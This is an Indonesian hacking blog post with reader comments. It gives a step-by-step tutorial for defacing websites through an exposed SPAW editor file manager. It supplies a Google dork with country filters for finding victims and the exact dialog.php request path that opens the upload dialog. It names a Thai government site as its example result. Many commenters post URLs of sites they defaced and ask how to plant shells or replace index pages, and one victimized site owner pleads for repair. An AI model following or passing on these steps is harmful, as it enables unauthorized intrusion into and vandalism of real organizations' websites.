Sabtu, Juli 21, 2012
Cara Deface Website Melalui Spaw Uploads Vulnerability | Cirebon-Cyber4rt - Hallo sobat, udah seminggu ini ane ngga ngepost nih. Kali ini saya mau share tutorial deface sob, nama teknik defacenya yaitu Deface Website Melalui Spaw Uploads Vulnerability.
Yaudah deh, dari pada lama-lama ngoceh ngga jelas, mending langsung ke tkp aja gan. Berikut Cara Deface Website Melalui Spaw Uploads Vulnerability Cekidot :D
1). Pertama, Masukan Dorknya :
inurl:”spaw2/uploads/files/”
Setelah sobat memasukan dork diatas dikotak pencarian google, pilih salah satu web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p
Notes : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing, contoh saya tambahkan site:th pada akhir dork diatas. Jadi hasilnya begini :
inurl:”spaw2/uploads/files/” site:th
Maksud dari site:th adalah domain negara asal website yang akan kita serang, "site:th" asal kata Thailand, jadi website yang akan kita serang semuanya website Thailand. Kalian juga bisa mengganti dengan domain negara lain, misalnya site:com.my, site:jp, site:gov.cn etc asal jangan site:co.id yah !
2). Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :
http://contoh.com/spaw2/uploads/files/
3). Ganti pada Bagian /spaw2/uploads/files/ dengan kode dibawah ini :
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Sehingga Menjadi Seperti Ini :
http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file
4). Tekan Enter, Nanti akan Terbuka Seperti Ini :
5). Selanjutnya Liat Terus Gambar, Karena Tutorial ada Didalam Gambar.
6). Next, Pilih File Deface'an Sobat, Lalu klik Open dan Tunggu Hingga Loading Selesai.
7). Selanjutnya Klik Tombol Upload.
8). Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.
9). Selesai, dan Hasilnya :
http://www.dtam.moph.go.th/
Mungkin orang mengira saya gila tutor, segampang ini harus diperjelas seperti ini. Tapi inilah saya, sosok yang tidak sempurna dan masih banyak kekurangan. Saya hanya ingin memperjelas kepada sobat semua agar sobat bisa mengerti dengan jelas.
Karena dari pengalaman saya dulu saat menjadi newbie ( Sekarang pun Masih Newbie ) susah sekali mencari tutor yang sangat mudah untuk dimengerti, cari sana-sini tapi hasil tetap 0.
Maka tujuan saya menulis tutorial ini biar sobat-sobat semua yang masih pemula ( Bukan saya sok, saya juga masih belajar ) dan masih belajar bisa mengerti.
Sekian Postingan saya kali ini tentang Cara Deface Website Melalui Spaw Uploads Vulnerability, semoga dapat bermanfaat bagi sobat semua.
Source : Hacker Newbie
116 comments:
Up up ..!!
Siap di coba dlu kak :D hahahay ,
Pekalongan Cyber4rt: hehehe...
silahkan gan, semoga berhasil :D
keren bro, langsung mau nyoba akh :D
Well well keren-keren trik deface-Nya sobat.. dan cukup jelas kok bagi ane hehe, thanks sobat sudah mau berbagi.
wew dah lama gk main kesini makin ngeri postnya wawkawkakaw, coba ahh =))
Benny Dwi: silahkan sob, sukses ya :)
Suhendri Mr: hehee.. sama-sama sob :D
Mbah Qopets: wkwkw lebay ah si mbah =))
wah boleh jg nih sob, ane coba dulu yah?
waduh nich tutorial bikin penasaran bgt c, coba ach, mkasih bang yaaa :)
deface itu apaan sih sobat?
wah ane belum nyambung sob, happy blogging aja yah:}
wow, coba deh bro :) nice..!
wah, ada lagi tutor hacking. Ane coba dulu gan..
Penjelasan nya gak rumit bro. Thanks ya. Mau praktek dulu.
gan bisa gak langsung di halaman depanya/homepage ya ???
ane bookmark gan, keren ini... baru tahu saya...
ijin praktek bang :D
wew.. mantap bang :D share yang lebih ganas lagi hehehehe..
selamat berpuasa.
smoga puasanya lancar
mantap
ane berhasil sob
http://www.dtam.moph.go.th/snt/admin/spaw2/uploads/files/ibnuh_1.html
copas punya kamu sob
Aldio Blog: silahkan sob :D
Goyang Patah-Patah: siiip... sama-sama gan :D
Windows Blog: deface adalah mengubah tampilan halaman website secara ilegal :)
Muro'i El-Barezy: hehehe ok :D
Alam Perwira: silahkan sob :D
Seaful Rahman: monggo dicoba gan, sukses ya :D
Yuyud: siiip, silahkan bro :)
Surya Pratama: kasian gan, web orang, ntar dosa, apalagi ini kan bulan puasa :D
Cendikiawan IT: siip hehee :D
Ulan News: silahkan bang :)
ChlizAceh: wkwkwk ok mastah =))
Ahmad Rizal Samsi: selamat berpuasa juga :)
Ahmad The Cheater: ok hehehe (y)
ane berhasil sob. Ane tunggu tutor hacking berikutnya.
Bro minta HTMLnya dong
dan cara setting lagunya :D
Saeful Rahman: ok sob, stay tune aja hehee :D
Devil666: copy aja punya ane gan, terus diedit :)
mau, nanya sob. Cara ganti lagunya gimana ??
@Iqbal : Sepp gan gw udah bisa nih http://www.dtam.moph.go.th/sny/admin/spaw2/uploads/files/Devilz666.html
Bang Trima kasih Ats Infonya,sangat bagus dang bermanfaat...
saya juga mau nanya bang template blog ini bagus bangeeeetttt.....saya pengen dong templatenya,,,boleh gak ????
kirim link downloadnya ke email aku ya..?
budi.cool123@yahoo.co.id/..//
plisss ya bang
Saeful Rahman: agan cari kode mirip <embed nah kalo udah ketemu ganti dengan kode lagu agan :)
Devil666: ok lanjutkan sob :D
Spenza Sumpiuh: siiip, silahkan dicoba sob :)
@Cirebon-Cyber4rt : ok gan...Thank's
thanks infonya, sangat menarik nih untuk dicoba, sukses buat blognya
Bang Minta Donk Link download Templatesnya......
Plisss....?????
Saya baru tahu istilah beginiaan. Kegunaannya atau keuntungannya apa ya jika menerapkan cara ini ?
Kunjungan di pagi hari, mungkin lain waktu saya akan mempraktekan ilmu ini. Sepertinya penasaran.
wah ajib nih sobat cara untuk hack webnya, bisa dicoba nih sobat...
bookmark sekaligus nyoba
Belajar Komputer: sama-sama gan :D
Embun: setiap orang beda2 maksud dan tujuan ngedeface, ada yg serius, ada yg buat nyari sensasi dsb.
Asis Sugianto: silahkan sob hehee :D
wah..saya benar-benar tidak paham akan hal beginian kawan :)
ane belum ngerti sob, tapi kayaknya harus di coba deh. makasih tutornya
gan ijin copas ya!
Haryanto: ok sob, makasih udah berkunjung :D
Ilham: siip sama-sama :D
Cilacap Cyber4rt: silahkan gan :)
Bingung Nih Soob ....
Cobak Kasih Tutorial videonya ....
Pasti Lebih Terbantu...
Pusing sob bacanya XD....
Video Tutorial Nya Bro !!
mantap dah, boleh dicoba nih ...
maaf sob udha lama ga kesini :D
Nice sob... Banyak Berbagi Ilmu Unik Ternyata ya..he. salam kenal ya
Bang.. Minta HTML Codenya Donkk
datang lagi gan :)
mas kalo hack di hompage gemana mas ane masih binggung
nyimak dulu sobat, cukup menarik bagi yang pada demen hack-hackingan ....he.he.he..
ijin sedottt wc gan....
Terimakasih infonya gan aku suka & sukses terus
cara lainnya mas :D
yang langsung ke halaman berandanya..
Gan udah sampe tutor no 7, tapi kok pas mau klik "uploud" gak bisa?
Thx om....^^
tak boleh pon
Salam Agan,
Terima kasih atas infonya. Bang boleh kontak langsung kemana.
Terima kasih atas ilmunya jadi tau cara deface. Oya agan ane juga terima kasih udah nunjukin lobang di web ane www.OrderKaosOnline.com
Bang boleh minta tolong gak, itu di pulihkan. soalya itu web untuk cari rejeki halal.
Please ya bang.
Skali lagi makasih
Kak gimana cara buat file HTMLnya?
Mantap,,
Ijin Copas,,
work 100 % gan.... thanks
yesss ane bisa gan
http://www.sieps.com.br/spaw2/uploads/files/defacer.html
thanks.gan
., gan gua di tools yang Ke-4 koq gak biiasa yah??
tapi klw deface menggunakan komputer warnet blh.???
ane kok klik upload dari tadi gk muncul muncul gan?
minta HTML ya
Rahmat Aziz: coba diweb lain gan, karena ga semua web vuln di spawn uploadnya...
Yunanto: maaf sob, itu web yang ngerusak bukan saya, saya ga pernah bahkan belum pernah merusak web lapak orang selama itu web tujuannya baik.
saya hanya sekedar memberi tutorial deface untuk pembelajaran, bukan untuk merusak. coba agan tanyakan ke vendor hosting web agan, barangkali mereka bisa menemukan solusinya :)
wah adminya nya pura2 nich :-D ayo lah ajarin saya
tentang POST saya yang di->http://cirebon-cyber4rt.blogspot.com/2012/09/free-download-elite-keylogger-v49-build.html
kok tulisan upload nya gk bsa di klik ??
mohon solusi
wduhhh...
tombol Upload-nya g bis di klik bang
Iya bg , tombol uploadnya ga bisa diklik
gak bisa di upload gan :(
cari yang lain kalo ga bisa di upload gan :D
gan kok html ane g bisa d upload ya?
x bleh uploadpon..
bang Minta Script Deface Boleh Ga ?
ka tombol upload nya gak bisa di klik
sorry kak, udah bisa upload kalo ganti target..
Setrian' cari target lain aja gan,
Ahmad Afif: silahkan :)
Anonim: cari target lain aja...
matornuwon sedoyone kang.
uda share IP ( ilmu pengetahuan ).
terus berkembanglah team uandergroun IndonesiA
ga bisa di upload kk
setelah upload mo d.apain tu shell ?? cara ganti index dong..
d coba d coba
mas itu kok pas mau di upload, ketika saya ketik kok malah ga bisa yah "button upload-nya?"
jadi di ketik ga ada reaksi apapun...
thanks
kalo langsung di arahkan ke website tertentu tanpa melalui pencarian google dork bisa tidak?
terima kasih
saya kok ga bisa menekan tombol upload nya ??
Gimana nihh ??
Mantar Gan saya coba dlu ok !!
Sekarang udah ngak bisa ya sob ?
http://www.bnc.nu.ac.th/bnc_fa/spaw2/uploads/files/rey.html
ko sya g bisa y gan uploadnya g mau di klik
terima kasih ilmu2 nya
sangat manfaat buat ngingetin sisi security web & server
sekali lagi tq
tutor tutor di sini bagus bagus.. :)
salam super gan hehe ;)
*sok mario teguh yach gue*
saya suka tutor ente sudah mahir tapi tetep rendah hati dan tidak sombong
semoga ilmu ente makin berkembang dan jangan lupa share gan biar tambah berkah ilmunya ;)
bang yg site:my koq kagak keluar y ?? semuanya PDF .. need jawaban bukan celaan .. ane masih newbie
ini gak bener-2 kena hack kan? cuma trik aja kan? hehehe
gan , harus pakek code inurl:”spaw2/uploads/files/” untuk mendeface ? apakah ga ada code lain ? terus kalau mau deface blog atau web tertentu bisa juga dengan menggunakan code di atas ? apakah deface yang saya cobak permanen ?
maaf gan banyak tanyak soal nya masih nubi :D
Mas mi min , ini cara hecker webyah, yang pas webnya dibuka hanya akan muncul layer hitam terus ada musiknya ..
Mantap boss..Cirebon-Cyber4rt oke banget.
upload file html nya dimana sob........
boleh beri link deface ?
ane kok pas klik upload, gk ke upload-upload sih gan
tpi tampilan di home ga terpengaruh gang!.... wkwkwkkk... admin mau pencerahan dong!..
Kak Cirebon-cyber4rt
saya Boleh Minta Script Yang di foto itu??
Kalau Boleh Kirim Di Ajie.putra32@gmail.com
yaa . .
kaga bisa click uploud gan
om bs tanam shell g,...
mantab nh tutornya gan... :-D
tutor yang nanem shell tapi lewat upload bukan llewat aplikasi webdav ada gan?
mastah gimana cara ganti index nya
uh gan saya ga bisa upload
kok 404 Not fount O.o
kok tak bisa di upload ya.. ckck bagaimana ?? solusinya terimakasih.. :)
Mantaf Om :3
Saat upload link uploadnya gk bisa
gan saat udh di spaw file manager nya, aku udah ganti ke files, tpi kok kosong gan?, emang files nya taruh dmn?
Mau nanya nih lae , kalo devace pke Havij bsa jg kan ? pke find admin?
kembangkan brow.... spya tmn2 yg lain suatu saat bsa membantu perang dunia maya
Mantap stah.. gg tetap merendah ..ada wa ?
Posting Komentar